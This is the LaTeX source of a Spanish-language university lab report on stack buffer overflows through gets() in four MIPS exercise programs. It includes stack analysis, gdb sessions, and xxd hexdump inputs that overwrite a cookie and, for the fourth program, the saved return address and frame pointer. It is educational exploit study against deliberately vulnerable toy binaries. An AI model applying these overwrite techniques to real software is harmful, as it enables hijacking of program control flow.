\documentclass{article}
\usepackage[utf8]{inputenc}
\usepackage[spanish]{babel}
\usepackage{pdfpages}
\usepackage{listings}
\usepackage{graphicx}
\usepackage{float}


% CUSTOM CMDs and ENVs

\lstnewenvironment{bash}[2]
{
\lstset{language=bash}}
{}

\lstnewenvironment{asm}[2]
{
\lstset{language=bash}}
{}

\setlength{\parskip}{1ex plus 0.5ex minus 0.2ex}

\title{Trabajo Prático 1} 
\author{\\
  Paulo Cesar Cúneo, \textit{Padrón Nro. 84840}\\
  \textit{paulocuneo@gmail.com}
  \and
  Agustin Alejandro Linari, \textit{Padrón Nro. 81783}\\
  \textit{agustinlinari@gmail.com}\\
  \and
  Pablo Daniel Sívori, \textit{Padrón: 84.026}\\
  \textit{sivoridaniel@gmail.com}
  \normalsize{1$^{\circ}$ Cuatrimestre de 2016}                           \\
  \normalsize{66.20 Organizacion de Computadoras}                  \\
  \normalsize{Facultad de Ingenieria, Universidad de Buenos Aires} \\
}

\begin{document}         

\maketitle                   % Produces the title.
\clearpage
\tableofcontents
\clearpage

\part{Desarrollo}

\section{Introduccion}
Este trabajo práctico es un estudio de la vulnerabilidad de desbordamiento de buffer en programas compilados siguiendo las especificacion de la ABI MIPS.
Se estudiaron 4 casos de explotacion de la vulnerabilidad de la funcion gets, que forma parte de la libreria estandar. En cada caso se analizo el stack y se determino como generar un entrada tal que modifica la ejecucion de del programa en una forma que no fue planificada por el creador del programa.

El objectivo de cada ejercicio es lograr, especificando un input, que el programa imprima la frase "you win". Esto se logra gracias a que los programas en cuestion utilizan la funcion gets. Esta funcion graba caracteres leidos de sdtin a un buffer(en memoria) que recibe como argumento, deteniendoso unicamente si lee el caracter '/n' o si llega al fin del archivo.
En cada programa el buffer es una variable local, por lo que de acuerdo a las especificacion de la ABI de mips, se entra proxima a otras variables locales y a la locacion de memoria donde se almacenan registros relacionados a la ejecucion de un funcion.
 

\section{Build}

El correspondiente informe se puede construir utilizando el comando make con la etiqueta doc, la cual borra y genera el informe en formato pdf. Esto se hizo para poder actualizar el mismo en caso de haber realizado alguna modificación en el código fuente, dado que este esta adjunto en el apendice.

\section{Análisis del Stack}

Cada funcion que cumple la especificacion de la ABI de mips, utiliza el stack de una forma especifica. 
Al iniciar la ejecucion de una funcion, la misma "reserva" una porcion de memoria del stack suficientemente grande como para alocar 3 areas donde guarda argumentos para funciones que invoca(ABA), variables locales(LTA) y registros de control(SRA).

Para las funciones stack1, stack2, stack3 , la variable buf es la primera variable local declara, esta ocupa loca primeros 80 bytes de la LTA, acontinuacion se encuentra la variable cookie, ocupando 4 bytes, seguida de un padding de 4 bytes.
Luego de la LTA se encuentra la SRA donde se guardan respectivamente los registros gp, fp y ra, cada uno ocupando 4 bytes, seguidos de un padding de 4bytes. 

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.4]{./antes.jpg}
	\caption{Stack1 Inicio}
	\label{fig:stack1_ejemplo}
\end{figure}

Se observa que si gets lee mas de 80 caractes sin encontrar el fin de archivo o el fin de linea, termina pisando 
la variable cookie; con una entrada suficientemente grande podria pisar la zona de memoria de la SRA de la funcion actual o incluso el stack de funciones que estan mas arriba en la jerarquia de llamadas de la ejecucion.

\section{Diseño de la entrada}

Teniendo en cuanta el analisis del stack, se quiere determinar una entrada sobreescriba que sobreescriba el stack de forma tal que cuando que codigo correspondiente a la impresion de la frase "you win!" sea ejecutado. En los primeros casos cookie se comprar contra una constante, por lo que si se logra sobre escribir cookie con ese valor, logramos ejecutar el printf.

\begin{description}
\item[$\bullet$ Stack1] Se ingresan 84 bytes donde los ultimos bytes son los ascci correspondientes a "DCBA".
\item[$\bullet$ Stack2] Se ingresan 84 bytes donde los ultimos bytes son 05, 03, 02, 01.
 Si bien estos caracteres no son imprimibles no cortan la ejecucion de gets.
\item[$\bullet$ Stack3] Analogo al Stack2 pero los ultimos bytes son 05, 00, 02, 01.
\item[$\bullet$ Stack4] En esta caso no se pueden ingresar los bytes correspondientes al valor contra el que se compara cookie, por que el valor contiene el byte 0x0a, que corresponde al fin de linea y por lo tanto corta la escritura a memoria que realiza gets.
\end{description}

Dedicamos una seccion al analisis del caso Stack4.

\subsection{Diseño de entrada para Stack4}

En este caso el valor de cookie para imprimir "you win", incluye el byte ascii correspondiente al '\\n' 0x0a.
Como gets detiene la lectura al encontrar este caracter no podemos ingresar en el input.
La alternativa que encontramos fue explotar que el programa siempre se carga en la misma direccion de memoria, con lo cual podemos generar un buffer overflow que sobreescriba el ra y fp, de forma tal que al ejecutar el protocolo de salida de stack4, el program counter salte la posicion del programa que imprime "you win!". Solo con pisar el valor de ra no es suficiente hay que tener en cuenta los siguientes puntos.

\begin{itemize}
 \item Al sobre escribir los bytes de ra en el stack tambien estamos sobre escribiendo los bytes de fp y gp.
 \item Sobreescribir con cualquier valor fp, puede implicar un salto de pagina y/o un lectura no alineada.
 \item Si unicamente preservamos el valor fp, la ejecucion entra en un loop imprimiendo "you win!" infinitas veces. 
\end{itemize}

La solucion es escribir en el buffer los valores de fp y ra anteriores. Y luego sobreescribir el valor de fp de forma que apunte a la posicion donde se encuentran los valores correctos.
Para obtener esta informacion, decidimos gdb, para lo cual tambien fue util debugear utilizando el codido assembly del programa.
\subsubsection{Analisis del codigo assembler de Stack4}

Generamos el codigo assembler correspondiente al programa stack4 

\begin{bash} 
 gcc -S src/stack4.c 
\end{bash}

Del resultado inspeccionamos el codigo, para determinar si es posible sobreescribir el fp de forma que pueda utilizar datos almacenados en el buffer.

\begin{bash}
 gcc stack4.s -g -o stack4
\end{bash}

Vemos que si podemos poner el \$pc en la linea 76 lograriamos el cometido.

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.4]{./tp1-stack4-final.png}
	\caption{Stack1 Inicio}
	\label{fig:stack4_ejemplo}
\end{figure}

Por otro lado si reproducimos la ejecucion vemos los siguiente:

\begin{asm}
	bne	\$3,\$2,\$L6
\$L6:
	move	\$sp,\$fp         
	lw	\$31,120(\$sp) 
	lw	\$fp,116(\$sp) 
	addu	\$sp,\$sp,128
	j	\$31        #  Sobreescrito ra 
                    #  pasa a la ejecucion de printf
	la	\$4,\$LC2   # 
	la	\$25,printf
	jal	\$31,\$25
\$L6:
	move	\$sp,\$fp     # Sobreescrito \$fp, 
                            # ahora el \$sp tiene su valor.  
	lw	\$31,120(\$sp) # valores relativos a la nueva posicion del sp.
	lw	\$fp,116(\$sp) 
	addu	\$sp,\$sp,128
	j	\$31  # Ahora si vuelve a main
	
\end{asm}

Por lo cual es posible realizar lo que proponemos.

\subsubsection{Determinacion de los valores de fp y ra de Stack4}

Para determinar los valores de fp y ra previos utilizamos gdb para examinar la memoria.

\begin{bash} 
root@:~/tp1# gcc stack4.s -g -o stack4
gcc stack4.s -g -o stack4
/var/tmp//ccKbeoPh.o(.text+0xa4):/root/tp1/stack4.s:66:
 warning: warning: this program uses gets(), which is unsafe.
root@:~/tp1# gdb stack4 
gdb stack4 
GNU gdb 5.3nb1
Copyright 2002 Free Software Foundation, Inc.
This GDB was configured as "mipsel--netbsd"...
(gdb)  b 66
 b 66
Breakpoint 1 at 0x400bf4: file stack4.s, line 66.
(gdb) b 77
b 77
Breakpoint 2 at 0x400c50: file stack4.s, line 77.
(gdb) run 
run 
Starting program: /root/tp1/stack4 
buf: 7fffdc28 cookie: 7fffdc78

Breakpoint 1, stack4 () at stack4.s:66
66		la	\$25,gets
Current language:  auto; currently asm
(gdb) x (\$sp + 120)
x (\$sp + 120)
0x7fffdc88:	0x00400b84
(gdb) x (\$sp + 116)
x (\$sp + 116)
0x7fffdc84:	0x7fffdc90
(gdb) 

\end{bash}

\subsubsection{Diseño de entrada de Stack4}

Conocidos los valores de ra y fp pasamos disenar la entrada para el cuarto programa.
En este caso al ser caracteres no imprimibles decidimos utilizar le programa xxd para a partir de un hexdump
generar el binario a utilizar como entrada. 
Una vez mas no ayudamos con gdb para obtener una idea rapida del hexdump necesario.

\begin{bash}
(gdb) x/25 (\$sp + 24)
x/26 (\$sp + 24)
0x7fffdc28: 0x7df9a500 0x7fffdc3c 0x7df9a500 0x7df17044
0x7fffdc38: 0x7fffddb4 0x7dfa9200 0x7dfa9000 0x7fffdc5c
0x7fffdc48: 0x7df9a500 0x00000001 0x7dfa9000 0x7dfb44cc
0x7fffdc58: 0x7df9a500 0x7df9a500 0x10008030 0x7df17044
0x7fffdc68: 0x7fffddd4 0x7fffdcf8 0x10008030 0x004006a0
0x7fffdc78: 0x7df9a500 0x7dfa9000 0x10008030 0x7fffdc90
0x7fffdc88: 0x00400b84 0x7df9a500
(gdb) 

Utilizando el volcado como template obtenemos:

0000000: 0x00000000 0x00000000 0x00000000 0x00000000
0000010: 0x00000000 0x00000000 0x00000000 0x00000000
0000020: 0x00000000 0x00000000 0x00000000 0x00000000
0000030: 0x00000000 0x00000000 0x00000000 0x00000000
0000040: 0x00000000 0x00000000 0x10008030 0x7fffdc90
0000050: 0x00400b84 0x00000000 0x10008030 fp'
0000060: ra'        0x0000000a
\end{bash}

Para determinar el valor de ra que deberiamos utilizar ponemos un breakpoint en la linea 75 del assembler 
e inspeccionamos el pc.

\begin{bash}
Breakpoint 3, stack4 () at stack4.s:75
75		bne	\$3,\$2,\$L6
(gdb) i r
i r
          zero       at       v0       v1 
 R0   00000000 7df8faf0 000d0a00 7df9a500 
            a0       a1       a2       a3
      7df8fb48 00000001 00000011 00000000 
            t0       t1       t2       t3
 R8   7de50000 00025c80 00000020 0000000c
            t4       t5       t6       t7
      00000007 00000007 00000002 00000001 
            s0       s1       s2       s3
 R16  7fffddd4 7fffdcf8 00000001 7fffdcfc
            s4       s5       s6       s7
      7fffeff0 7dfb44cc 7dfa9000 00000000 
            t8       t9       k0       k1
 R24  00000019 7df3b7d0 00000000 00000000
            gp       sp       s8       ra
      10008030 7fffdc10 7fffdc10 00400c2c 
            sr       lo       hi      bad
      0008ff3c 000000db 0000006c 10002004
         cause       pc
      00000024 00400c3c 
           fsr      fir       fp
      00000000 00000000 00000000 
(gdb) 
\end{bash}

En este punto suponiendo que bne es una instrucion atomica 
El valor de ra a utlizar seria  "0x400C40", 
por otro lado el valor de fp a 
sobreescribir es el valor actual menos 16 , es decir, "0x7FFFDB90"
Finalmente para utilizar xxd reescribimos el volcado ordenando
los bytes de menor a mayor de izquierda a derecha:

\begin{bash}
0000000: 0000 0000 0000 0000 0000 0000 0000 0000
0000010: 0000 0000 0000 0000 0000 0000 0000 0000
0000020: 0000 0000 0000 0000 0000 0000 0000 0000
0000030: 0000 0000 0000 0000 0000 0000 0000 0000
0000040: 0000 0000 0000 0000 3080 0010 90dc ff7f
0000050: 840b 4000 0000 0000 3080 0010 90db ff7f
0000060: 400c 4000 0a00 0000
\end{bash}

\subsection{Antés de la corrida}
 
Para los programas Stack1, Stack2, Stack3 y Stack4 el stack, antés de la corrida de cada programa, es el mismo. Ver Figura ~\ref{fig:stack1_antes}

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.4]{./antes.jpg}
	\caption{Stack1 Inicio}
	\label{fig:stack1_antes}
\end{figure}

\section{Corridas de Prueba}

\subsection{Analisis grafico}

El stack1 quedaría de la siguiente manera, con el valor de cookie espereda DCBA para poder luego poder mostrar la frase you win. 

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.4]{despues1.jpg}
	\caption{Stack1 Después}
	\label{fig:stack1_despues}
\end{figure}

Para el stack2 vemos que la cookie se pisa con los caracteres de control 01 (comienzo de encabezado), 02(comienzo de texto), 03 (fin de texto) y 05 (consulta). 

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.4]{despues2.jpg}
	\caption{Stack2 Después}
	\label{fig:stack2_despues}
\end{figure}

Para el stack3 vemos que la cookie se pisa con los caracteres de control 01 (comienzo de encabezado),  02(comienzo de texto), 00 (caracter nulo) y 05 (consulta). 

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.4]{despues3.jpg}
	\caption{Stack3 Después}
	\label{fig:stack3_despues}
\end{figure}

Para el stack4 vemos que modificando el ra, podemos alterar la finalizaion de la funcion y alterando el fp podemos recupara la ejecucion de salida normal de la funcion.

\begin{figure}[H]
	\centering
		\includegraphics[scale=0.4]{./tp1-stack4-final.png}
	\caption{Stack3 Después}
	\label{fig:stack4_despues}
\end{figure}

\subsection{Corridas por consola}
El script de makefile que forma parte de la entre compila los 4 archivos en cada programa y luego ejecuta las corridas de prueba.
La ejeccion de la corrida de prueba utiliza xxd -r para a partir de la solucion escrita como hexdump el input correspondiente es decir, las pruebas se pueden ejecutar manualmente como: xxd -r src/sol1 | ./stack1

\begin{bash}
root@:~/tp1# make
rm -f  stack4 stack3 stack2 stack1
rm -f doc/report.aux doc/report.log doc/report.dvi
cc  src/stack4.c -o stack4
/var/tmp//ccmmITye.o(.text+0xa4): In function `stack4':
: warning: warning: this program uses gets(), which is unsafe.
cc  src/stack3.c -o stack3
/var/tmp//ccCe22rj.o(.text+0x54): In function `main':
: warning: warning: this program uses gets(), which is unsafe.
cc  src/stack2.c -o stack2
/var/tmp//ccsBkKa6.o(.text+0x54): In function `main':
: warning: warning: this program uses gets(), which is unsafe.
cc  src/stack1.c -o stack1
/var/tmp//cc8b31TZ.o(.text+0x5c): In function `main':
: warning: warning: this program uses gets(), which is unsafe.
echo "Testing solutions:"
Testing solutions:
echo "Stack1:"
Stack1:
xxd -r src/sol1 | ./stack1 ;true
buf: 7fffdac0 cookie: 7fffdb10
cookie: 41424344
you win!
echo "Stack2:"
Stack2:
xxd -r src/sol2 | ./stack2 ;true
buf: 7fffdac0 cookie: 7fffdb10
cookie: 01020305
you win!
echo "Stack3:"
Stack3:
xxd -r src/sol3 | ./stack3 ;true
buf: 7fffdac0 cookie: 7fffdb10
cookie: 01020005
you win!
echo "Stack4:"
Stack4:
xxd -r src/sol4 | ./stack4 ;true
buf: 7fffda98 cookie: 7fffdae8
Cookie: 00400b84
you win!
[ warning: LOW reference: vaddr=0x00000000, exception TLBL, pc=0x00000000 <(no symbol)> ]
[1]   Done                    xxd -r src/sol4 |
      Segmentation fault (core dumped) ./stack4
echo "done"
done
root@:~/tp1# 
\end{bash}

En el caso del ultimo punto no pudimos lograr una ejecucion que no genere un segment fault.
Es probable que nuestra hiposis de que el programa se carga en memoria de la mismo forma siempre no sea correcta y dependiendo de como se compile o el estado de netbsd almenos el stack esta cargado de forma distinta.

\clearpage

\part{Apendice}
\appendix

\section{Enunciado original}\label{sec:enunciado}
\includepdf[pages={-}]{enunciado.pdf}

\end{document}               % End of document.

\end{document}
